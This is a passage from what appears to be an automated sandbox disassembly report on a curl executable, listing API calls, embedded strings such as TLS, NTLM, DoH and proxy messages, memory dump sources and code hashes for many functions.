                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: calloc
                                • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %ld ms$Unix socket path too long: '%s'
                                • API String ID: 2635317215-2215122109
                                • Opcode ID: eb95ec1867a5a4271ac762f735e32716331e103e5b4729a557248d74bffc0bca
                                • Instruction ID: 3ab78ace1228551fcd50a8bbd183174ee0e6bb76c5cca59ab555bdd81544fd8b
                                • Opcode Fuzzy Hash: eb95ec1867a5a4271ac762f735e32716331e103e5b4729a557248d74bffc0bca
                                • Instruction Fuzzy Hash: A371A331E04A59AFEF11AB68CC45BAE7BB1FF55710F1840B9ED04EB2D1D6B19C009B92
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088BEFF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088BF35
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C00C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C161
                                  • Part of subcall function 0087A7F6: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 0087A80D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: No URL set$User-Agent: %s
                                • API String ID: 1294909896-339178133
                                • Opcode ID: 78cf07cc1dd7f834155200c0712ad6a20f2a1b63cc61df47babc60680d9acac8
                                • Instruction ID: 52c7d9a77c435aa0373c7886c8c0bceb2bee9fc05fb407e2bdcd2456fdf89d6e
                                • Opcode Fuzzy Hash: 78cf07cc1dd7f834155200c0712ad6a20f2a1b63cc61df47babc60680d9acac8
                                • Instruction Fuzzy Hash: C49159356046418FDF15AF6898C0BA53BA1FF99350F2841BADC59CF28BDB709941CB72
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A62F0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A632C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A6356
                                Strings
                                • schannel: shutting down SSL/TLS connection with %s port %hu, xrefs: 008A6118
                                • schannel: ApplyControlToken failure: %s, xrefs: 008A61B9
                                • schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 008A62AE
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
                                • API String ID: 1294909896-1242988243
                                • Opcode ID: 53a296296dd1c54a389111eedfe6a44c233f11b148321f795219119e23ce9bf5
                                • Instruction ID: 7f7b95c4befd561eb805c40e3385332c2e11fec3abb57c2d163361f1e17bca9b
                                • Opcode Fuzzy Hash: 53a296296dd1c54a389111eedfe6a44c233f11b148321f795219119e23ce9bf5
                                • Instruction Fuzzy Hash: 63818A70900629DFEB249F14CC44BD9BBB5FF09310F0481A9E849A7792DB74AEA4CF80
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
                                • API String ID: 0-4260076447
                                • Opcode ID: db4191d775912bc0c51bc98ccd02f93361039d2cdebb7a047b4789c6ba68ea8b
                                • Instruction ID: d47ddc4cde239afda1753bad2dcebb3b317d0c73d28b95fbaca383141ad1db3c
                                • Opcode Fuzzy Hash: db4191d775912bc0c51bc98ccd02f93361039d2cdebb7a047b4789c6ba68ea8b
                                • Instruction Fuzzy Hash: 3E71D070A052149BEB249F28DC99BAAB3B5FF45310F1041ADE45DDB291EB349E80CF41
                                APIs
                                  • Part of subcall function 00875DA0: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,008833F9), ref: 00875DB7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00891FCD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: callocfree
                                • String ID: ;type=$;type=%c$?%s$ftp$http
                                • API String ID: 306872129-3547414
                                • Opcode ID: 1821b999c336092f5340969ff7d0cae08a60bc47718e65f96de58af90d95e2f8
                                • Instruction ID: 7c19e3af07d69e676f28271ef4c6c18f564ab4f6e21014a72364417313c030ec
                                • Opcode Fuzzy Hash: 1821b999c336092f5340969ff7d0cae08a60bc47718e65f96de58af90d95e2f8
                                • Instruction Fuzzy Hash: 9241D831708B467BEF24E6299859F6A2BE5FFC5760F188139F808DB285EF60DC42C255
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00896136
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: SMTPUTF8$%s %s%s$EXPN$HELP$VRFY %s%s%s%s
                                • API String ID: 1294909896-2300960079
                                • Opcode ID: 75d28bdcc5eae06ad6225c1c85cb266152642e5dc94a9cd7f4310ffe8a0f0b33
                                • Instruction ID: 70c608e40e864328816de6cf52d2d9cfc19dd30c3dc4f9bac4c6f02bfd701d3f
                                • Opcode Fuzzy Hash: 75d28bdcc5eae06ad6225c1c85cb266152642e5dc94a9cd7f4310ffe8a0f0b33
                                • Instruction Fuzzy Hash: E041F571A049265FEF15AA588890ABB7BB9FF46314F2C80ADED44E7302E670DD548790
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000009B8,?,?,00890F95,?,?,00000000,?), ref: 008A0C78
                                Strings
                                • NTLM auth restarted, xrefs: 008A0C10
                                • NTLM, xrefs: 008A0BD1
                                • NTLM handshake failure (internal error), xrefs: 008A0D1C
                                • NTLM handshake failure (empty type-2 message), xrefs: 008A0C52
                                • NTLM handshake rejected, xrefs: 008A0CF3
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (empty type-2 message)$NTLM handshake failure (internal error)$NTLM handshake rejected
                                • API String ID: 2803490479-2228421627
                                • Opcode ID: 823a43dd7fccc4b05c4286b2bc67dedf9359c44faac6c02fd58d5723d3a435ac
                                • Instruction ID: 2d3592c07f5af602f79832e684b7895870dc2b6883f8c490bd160fbdc7d1026c
                                • Opcode Fuzzy Hash: 823a43dd7fccc4b05c4286b2bc67dedf9359c44faac6c02fd58d5723d3a435ac
                                • Instruction Fuzzy Hash: 3141F271A04306AFEB14AB58D891BA9B7B4FF19324F204169E505E7682EB71D904CF51
                                Strings
                                • Mime-Version: 1.0, xrefs: 008A1771
                                • Cannot APPEND without a mailbox., xrefs: 008A1701
                                • Mime-Version, xrefs: 008A175A
                                • APPEND %s (\Seen) {%I64d}, xrefs: 008A180B
                                • Cannot APPEND with unknown input file size, xrefs: 008A17CF
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Mime-Version$Mime-Version: 1.0
                                • API String ID: 0-3307439731
                                • Opcode ID: 02662b22c2ebdf64e852246534b6bf9d618f5ebddfcc3ee2b82cd304ade4e20e
                                • Instruction ID: d41b1b6aacd39190bbc42e549da4cdb6c402f115e03945b3f908c00218455657
                                • Opcode Fuzzy Hash: 02662b22c2ebdf64e852246534b6bf9d618f5ebddfcc3ee2b82cd304ade4e20e
                                • Instruction Fuzzy Hash: CC310931704A02ABFF1C5B289899F7AB3A1FB81714F10422DE529CA6C4EF74A811D7C5
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 008905B5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?), ref: 008905F1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 00890612
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
                                • API String ID: 1294909896-2961970465
                                • Opcode ID: b0ebf8fbeae98ba0750c348c8f21b6b52ed8f879e3c5bbfe9d415cf236e0f815
                                • Instruction ID: 902b7af385f100b8116ba4b138c10b57081d648c8822c5eb4f4c56bb20920e58
                                • Opcode Fuzzy Hash: b0ebf8fbeae98ba0750c348c8f21b6b52ed8f879e3c5bbfe9d415cf236e0f815
                                • Instruction Fuzzy Hash: 30318F35B04609AFEF049B98D851BAABBB5FF84314F148079D901E7342EBB1AD15CFA0
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089CDAE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089CE26
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: freemalloc
                                • String ID: OS/400$SITE NAMEFMT 1
                                • API String ID: 3061335427-2049154998
                                • Opcode ID: f5f256fdf9914be1e6a39ea5bf4b0b81f48baef261c2c154a3a399db160911a9
                                • Instruction ID: 9f37b72bb41fa9c21ddec57d392cb229205a9aa3edaa1b66fc4cfd7260091468
                                • Opcode Fuzzy Hash: f5f256fdf9914be1e6a39ea5bf4b0b81f48baef261c2c154a3a399db160911a9
                                • Instruction Fuzzy Hash: 56319E71A04629DBDF10EF58D840AAC7BF1FB49754F1C40BAE905EB352CB719D018BA4
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 0086EE54
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0086EE65
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
                                • API String ID: 1294909896-250881521
                                • Opcode ID: b03fb4cc68f6c6ec2377fc7ec11192b478dbae5a5b12013b88888b7d2f193f61
                                • Instruction ID: 0ff7e46d8658197b9c1805bbe18fcd6e59fe3a8bd2511ad857070c1278199d76
                                • Opcode Fuzzy Hash: b03fb4cc68f6c6ec2377fc7ec11192b478dbae5a5b12013b88888b7d2f193f61
                                • Instruction Fuzzy Hash: 4B21F8319446146BDF321BD8AD82F5A73A1FB45B70B160228FD24EB382EB76CD008691
                                APIs
                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00883B8B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: tolower
                                • String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
                                • API String ID: 3025214199-127164392
                                • Opcode ID: 25c593dcd86132bedd5dd92f2ad3aad1dbfb7b2b205a03d84354b7bf233919a5
                                • Instruction ID: 1bb88550c7f914b03e339f7923d58f8f8dbfaecda054953dc021d172bc909435
                                • Opcode Fuzzy Hash: 25c593dcd86132bedd5dd92f2ad3aad1dbfb7b2b205a03d84354b7bf233919a5
                                • Instruction Fuzzy Hash: 6D21F571E0066547CB21BB289810BAA7775FF51BA4F0981E9E889FB306DE70CE4987D0
                                APIs
                                • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,00000000,00000001,000009C9,000009C9,?,00881E86,?,?,00000000), ref: 00888B1D
                                • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00881E86,?,?,00000000), ref: 00888B30
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00881E86,?,?,00000000), ref: 00888B3C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00881E86,?,?,00000000), ref: 00888B69
                                • closesocket.WS2_32(00881E86), ref: 00888B7A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00888B94
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
                                • String ID:
                                • API String ID: 469868127-0
                                • Opcode ID: 7908153c266a6281ef9c3e34d6b12c49aeea3eef2f4f2fbacb3d8ba1659103b3
                                • Instruction ID: 49d7baacfed691c666048e2e85bd897adad1aa60d6a6be3931a2b0de00ae1bf7
                                • Opcode Fuzzy Hash: 7908153c266a6281ef9c3e34d6b12c49aeea3eef2f4f2fbacb3d8ba1659103b3
                                • Instruction Fuzzy Hash: 48118876600A15EFCB05AF64E848B5EBBB1FF48321F184169E805A3361DB71BC51CBE1
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088B8C8
                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0088B9D9
                                • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0088B9F4
                                Strings
                                • We are completely uploaded and fine, xrefs: 0088BAC3
                                • Failed to alloc scratch buffer, xrefs: 0088B8D5
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Ioctlmallocsetsockopt
                                • String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
                                • API String ID: 3560301164-2419666956
                                • Opcode ID: 6f8ea73fe72b9c20997c8d933a72a5fa216862ed2667c1b83d04d0102c5283d4
                                • Instruction ID: 6e0cf7a777b52b71c6dcce5c66140cdb8fb6a38c6cec76dbc2b66335eab923ed
                                • Opcode Fuzzy Hash: 6f8ea73fe72b9c20997c8d933a72a5fa216862ed2667c1b83d04d0102c5283d4
                                • Instruction Fuzzy Hash: 10C1A171B047469FDB18DF68C881BAABBF5FF84314F14427AE819DB285D770A841CBA1
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A589A
                                • WSAGetLastError.WS2_32 ref: 008A5A16
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A5A73
                                Strings
                                • select/poll on SSL socket, errno: %d, xrefs: 008A5A1D
                                • schannel: timed out sending data (bytes sent: %zd), xrefs: 008A5A34
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastfreemalloc
                                • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                • API String ID: 1010545285-3891197721
                                • Opcode ID: 19dd012fb91a6a70f7cdcc45cace20a2ec9ac365d4ba6451c8b96733570ebad7
                                • Instruction ID: 25e429b8d5db7c59856575350d14739eb2b3c5aee53bc7f25368293f0685c0b4
                                • Opcode Fuzzy Hash: 19dd012fb91a6a70f7cdcc45cace20a2ec9ac365d4ba6451c8b96733570ebad7
                                • Instruction Fuzzy Hash: 818128B56087059FD714CF18D880A1ABBE5FF89724F148A2DF999D73A1D770E940CB82
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0086D618
                                • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,008C07BC), ref: 0086D631
                                • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,008C07BC), ref: 0086D6C9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0086D715
                                Strings
                                • unrecognized protocol '%s', xrefs: 0086D6AF
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: strtok$_strdupfree
                                • String ID: unrecognized protocol '%s'
                                • API String ID: 2873614617-1936080967
                                • Opcode ID: 0360abf2d2c487513ec9f0e3e32a277f4c6b4c3e91aa57d6ba1104cfc7dd8c25
                                • Instruction ID: 41db6d6d7bcc8d733ce0830160e976a1bfeac895450cf53c95da6e0bd2dac973
                                • Opcode Fuzzy Hash: 0360abf2d2c487513ec9f0e3e32a277f4c6b4c3e91aa57d6ba1104cfc7dd8c25
                                • Instruction Fuzzy Hash: AE31E231F0570ADBD7219B68D985B397BE0FB557A8F260129E80ADB281D671DC018BD1
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000), ref: 00895305
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089533E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0089535A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00895391
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup
                                • String ID: realm
                                • API String ID: 2653869212-4204190682
                                • Opcode ID: debc92e7bb64a7022dc1abc22f07e56d71fe63b2e7df311dc1a6ad3c2a3de1b1
                                • Instruction ID: bca0d2640215132a6c3f1fbac5cd6b3898ba4648dbf70bd74a5a9040b46d4a07
                                • Opcode Fuzzy Hash: debc92e7bb64a7022dc1abc22f07e56d71fe63b2e7df311dc1a6ad3c2a3de1b1
                                • Instruction Fuzzy Hash: 6E31E631900A248BDF25AF64DC90AAEB7B4FF46750F18449EE885D7342DB709D449F50
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00897629
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0089766C
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(-000001F4,-000001F4,?,000003E8,00000000), ref: 0089769F
                                Strings
                                • set timeouts for state %d; Total % I64d, retry %d maxtry %d, xrefs: 0089768B
                                • Connection time-out, xrefs: 008975F6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_time64
                                • String ID: Connection time-out$set timeouts for state %d; Total % I64d, retry %d maxtry %d
                                • API String ID: 3039015236-3364887516
                                • Opcode ID: 8ae71c5c6bcda4ed4de42b3f51fbb91b75feb1b5165ccbb2433e4ce8910f3f8d
                                • Instruction ID: 11dc51d2e9cd8c25b0a0e6ed747d04aa637feebdb5913caa8198e45d1c72bf52
                                • Opcode Fuzzy Hash: 8ae71c5c6bcda4ed4de42b3f51fbb91b75feb1b5165ccbb2433e4ce8910f3f8d
                                • Instruction Fuzzy Hash: 3B210972718B009FDB36AE6D8C05E277AE5FBD4710F280E2EF045C6280FA71D9018791
                                APIs
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,00000000,00000000,?,?,008709E5,00000000,?,008707A5,?,?), ref: 00870896
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,008709E5,00000000), ref: 008708FD
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(008C1D90,00000000,008709E5,00000000,?,008707A5,?,?), ref: 0087093B
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,?,?), ref: 0087094F
                                Strings
                                Memory Dump Source
